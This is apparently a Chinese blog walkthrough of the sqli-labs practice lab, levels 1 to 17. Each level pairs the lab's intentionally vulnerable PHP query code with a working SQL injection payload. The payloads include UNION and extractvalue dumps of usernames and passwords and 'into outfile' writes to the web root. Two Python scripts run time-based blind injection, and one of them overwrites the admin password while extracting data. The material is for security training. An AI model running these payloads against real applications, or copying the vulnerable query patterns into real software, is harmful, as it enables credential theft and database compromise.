Less-1
payload:
?id=0' union select database(),group_concat(username),group_concat(password) from users--+php:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";Less-2
payload:
?id=0 union select 1,group_concat(username),group_concat(password) from users --+php:
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";Less-3
payload:
?id=0') union select 1,group_concat(username),group_concat(password) from users --+php:
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";Less-4
payload:
?id=0") union select 1,group_concat(username),group_concat(password) from users --+php:
$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";Less-5
payload:
?id=0' and extractvalue(1,concat(1,(select group_concat(username,':',password) from users where username!='此处加入想排除的字符,可往后查找')))--+php:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{
echo '<font size="3" color="#FFFF00">';
print_r(mysql_error());
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';
}Less-6
payload:
?id=0" and extractvalue(1,concat(1,(select group_concat(username,':',password) from users where username!='此处加入想排除的字符,可往后查找')))--+php:
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
下面的同Less-5Less-7
Method:into outfile 文件写入操作,如下:
payload:
?id=1')) union select 1,2,'' into outfile "C:\\xampp\\htdocs\\sqli\\Less-7\\1.php" --+php:
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font color= "#FFFF00">';
echo 'You are in.... Use outfile......';
echo "<br>";
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
echo 'You have an error in your SQL syntax';
//print_r(mysql_error());
echo "</font>";
}Less-8
payload:
?id=1' union select 1,2,'' into outfile "C:\\xampp\\htdocs\\sqli\\Less-8\\1.php" --+php:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{
echo '<font size="5" color="#FFFF00">';
//echo 'You are in...........';
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';
}Less-9
payload:
?id=1' union select 1,2,'' into outfile "C:\\xampp\\htdocs\\sqli\\Less-9\\1.php" --+php:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';
}Less-10
payload:
?id=1" union select 1,2,'' into outfile "C:\\xampp\\htdocs\\sqli\\Less-10\\1.php" --+php:
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
echo $sql;
echo "<br>";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';
}Less-11
payload:
uname: 1' union select group_concat(username),group_concat(password) from users;#php:
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//echo '<font color= "#0000ff">';
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in\n\n " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';
echo "</font>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}Less-12
payload:
uname: 1") union select group_concat(username),group_concat(password) from users;#php:
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//echo '<font color= "#0000ff">';
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';
echo "</font>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}Less-13
payload:
uname: 1') and extractvalue(1,concat(1,(select group_concat(username,':',password) from users where username!='此处加入想排除的字符,可往后查找' )));#php:
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//echo '<font color= "#0000ff">';
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
//echo 'Your Login name:'. $row['username'];
//echo "<br>";
//echo 'Your Password:' .$row['password'];
//echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';
echo "</font>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}Less-14
payload:
uname: 1" and extractvalue(1,concat(1,(select group_concat(username,':',password) from users where username!='此处加入想排除的字符,可往后查找' )));#php:
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//echo '<font color= "#0000ff">';
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
//echo 'Your Login name:'. $row['username'];
//echo "<br>";
//echo 'Your Password:' .$row['password'];
//echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';
echo "</font>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}Less-15
Python(盲注):
import requests
import time
import sys
# config-start
sleep_time = 1
error_time = 0.1
# config-end
def getPayload(indexOfResult, indexOfChar, mid):
# admin' or ()--
column_name="password"
table_name="username"
database_name="users"
payload = "((ascii(substring((select " + column_name + " from " + database_name + " limit " + indexOfResult + ",1)," + indexOfChar + ",1)))=" + mid + ")"#此处更改sql语句
payload = {"uname":"' or ((" + payload + ") and sleep(" + str(sleep_time) + "))-- ","passwd":"admin"}
return payload
def exce(indexOfResult,indexOfChar,queryASCII):
# content-start
url = "http://127.0.0.1:801/sqli/Less-15/"
postData = getPayload(indexOfResult,indexOfChar,queryASCII)
before_time = time.time()
requests.post(url, data=postData)
after_time = time.time()
# content-end
use_time = after_time - before_time
# judge-start
# 当sleep函数被执行 , 说明查询是正确的 (因为穷举毕竟错误的情况更多 , 要构造SQL语句让正确的情况执行sleep函数从而提高效率)
# 当使用二分查找的时候 , 控制正确/错误的时候执行sleep函数就不那么重要了
if abs(use_time) > error_time:
return True
else:
return False
# judge-end
def doSearch(indexOfResult,indexOfChar):
# 根据数据库中出现的字符的频率顺序重新构造列表进行查询
order = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','_','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',' ','!','"','#','$','%','&','\'','(',')','*','+',',','-','.','/','0','1','2','3','4','5','6','7','8','9',':',';','<','=','>','?','@','[','\\',']','^','`','{','|','}','~']
for queryChar in order:
queryASCII = ord(queryChar)
if exce(str(indexOfResult),str(indexOfChar + 1), str(queryASCII)):
return chr(queryASCII)
return chr(1)
def search():
for i in range(32): # 需要遍历的查询结果的数量
counter = 0
for j in range(32): # 结果的长度
counter += 1
temp = doSearch(i, j) # 从255开始查询
if ord(temp) == 1: # 当为1的时候说明已经查询结束
break
sys.stdout.write(temp)
sys.stdout.flush()
if counter == 1: # 当结果集的所有行都被遍历后退出
break
sys.stdout.write("\r\n")
sys.stdout.flush()
search()
代码来源:https://www.jianshu.com/p/e5a42373ed12php:
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
echo $sql;
echo "<br>";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//echo '<font color= "#0000ff">';
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in\n\n " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
//echo 'Your Login name:'. $row['username'];
echo "<br>";
//echo 'Your Password:' .$row['password'];
echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';
echo "</font>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
//print_r(mysql_error());
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}Less-16
把Less-15脚本SQL语句中前面的” ‘ “换成” “) “即可
Less-17
php
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
function check_input($value)
{
if(!empty($value))//检查是否为空
{
// truncation (see comments)
$value = substr($value,0,15);//截取前面15个字符
}
// Stripslashes if magic quotes enabled
if (get_magic_quotes_gpc())//此方法当magic_quotes_gpc开启时所有的 ' (单引号)、" (双引号)、\(反斜杠)和 NULL字符都会被一个反斜杠自动转义。 但在php5.4起已经被放弃,始终返回false
{
$value = stripslashes($value);//去除反斜杠
}
// Quote if not a number
if (!ctype_digit($value))//纯数字检测
{
$value = "'" . mysql_real_escape_string($value) . "'";//mysql_real_escape_string对字符串中的特殊字符进行转义,会被进行转义的字符包括: NULL(ASCII 0),\n,\r,\,'," 和 Control-Z.
}
else
{
$value = intval($value);//获取变量的整数值
}
return $value;
}
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
//making sure uname is not injectable
$uname=check_input($_POST['uname']); //uname被check_input了,详见上面的代码
$passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname."\n");
fwrite($fp,'New Password:'.$passwd."\n");
fclose($fp);
// connectivity
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
echo $sql;
echo "<br>";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
//echo $row;
if($row)
{
//echo '<font color= "#0000ff">';
$row1 = $row['username'];
//echo 'Your Login name:'. $row1;
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
mysql_query($update);
echo "<br>";
if (mysql_error())
{
echo '<font color= "#FFFF00" font size = 3 >';
print_r(mysql_error());
echo "</br></br>";
echo "</font>";
}
else
{
echo '<font color= "#FFFF00" font size = 3 >';
//echo " You password has been successfully updated " ;
echo "<br>";
echo "</font>";
}
echo '<img src="../images/flag1.jpg" />';
//echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font size="4.5" color="#FFFF00">';
//echo "Bug off you Silly Dumb hacker";
echo "</br>";
echo '<img src="../images/slap1.jpg" />';
echo "</font>";
}
}
?>python
import requests
str = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,_!@#$%^&*."
url = "http://192.168.184.1:801/sqli/Less-17/"
for i in range(1,200):
for j in str:
#1' where username='admin' and if(mid((select database()),1,1)= 's',sleep(3),1)#
#1' where username='admin' and if(mid((select database()),{},1)= '{}',sleep(3),1)#
#1' where username='admin' and if(mid((select group_concat(table_name,'') from information_schema.tables where table_schema=database()),{},1)= '{}',sleep(3),1)#
#1' where username='admin' and if(mid((select group_concat(column_name,'') from information_schema.columns where table_name='users' and table_schema=database()),{},1)= '{}',sleep(3),1)#
#1' where username='admin' and if(substr((select * from (select GROUP_CONCAT(BINARY(username),',',BINARY(password)) from users) as temp),{},1)= '{}',sleep(3),1)#
flag = "1' where username='admin' and if(substr((select * from (select GROUP_CONCAT(BINARY(username),',',BINARY(password)) from users) as temp),{},1)= '{}',sleep(3),1)#".format(i,j)
data = {"uname":"admin","passwd":flag,"submit":"submit"}
r = requests.post(url,data=data)
#print("{}".format(r.status_code))
if r.elapsed.total_seconds()>2:
print(j,end = '')
break加上where username='admin'是为了减少爆破时间,因为在改password的时候就只会改admin的password了,如果不加上亦可,不加上的话会将所有的password都改为1,但也达到了目的,在最后爆破字段的时候采用了一个虚表temp,因为update操作和select操作都作用于一张表,且会报错:Table 'test' is specified twice, both as a target for 'UPDATE' and as a separate source for data所以采用虚表进行盲注,且使用了BINARY函数来区分表中内容的大小写
若没有本文 Issue,您可以使用 Comment 模版新建。
GitHub Issues